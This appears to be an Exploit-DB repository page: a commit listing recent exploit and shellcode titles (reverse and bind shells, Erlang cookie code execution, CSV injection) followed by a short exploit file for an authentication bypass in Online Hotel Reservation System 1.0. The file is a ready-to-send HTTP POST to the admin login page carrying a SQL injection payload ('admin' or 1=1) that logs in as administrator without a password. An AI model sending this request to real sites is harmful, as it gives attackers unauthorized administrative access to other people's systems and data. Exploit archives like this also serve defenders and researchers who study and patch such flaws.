f8d41df29f
4 changes to exploits/shellcodes dnsrecon 0.10.0 - CSV Injection Erlang Cookie - Remote Code Execution Online Hotel Reservation System 1.0 - Admin Authentication Bypass Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode (91 bytes) Linux/x86 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Byte Free Shellcode (91 bytes) Linux/x64 - Reverse TCP Stager Shellcode (188 bytes) Linux/x64 - Reverse (192.168.55.42:443/TCP) Shell + Stager + Null-Byte Free Shellcode (188 bytes) Linux/x86 - bind shell on port 13377 Shellcode (65 bytes) Linux/x86 - Bind (0.0.0.0:13377/TCP) Shell (/bin/sh) Shellcode (65 bytes)
16 lines
No EOL
724 B
Text
16 lines
No EOL
724 B
Text
# Exploit Title: Online Hotel Reservation System 1.0 - Admin Authentication Bypass
|
|
# Exploit Author: Richard Jones
|
|
# Date: 2021-01-13
|
|
# Vendor Homepage: https://www.sourcecodester.com/php/13492/online-hotel-reservation-system-phpmysqli.html
|
|
# Software Link: https://www.sourcecodester.com/download-code?nid=13492&title=Online+Hotel+Reservation+System+in+PHP%2FMySQLi+with+Source+Code
|
|
# Version: 1.0
|
|
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34
|
|
|
|
#Exploit URL: http://TARGET/marimar/admin/index.php
|
|
Host: TARGET
|
|
POST /marimar/admin/login.php HTTP/1.1
|
|
Content-Length: 57
|
|
Connection: close
|
|
Cookie: PHPSESSID=82sevuai2qhh9h8b5jbucn0616
|
|
|
|
email=admin%27+or+1%3D1+--+-ac1d&pass=asdasdasd&btnlogin= |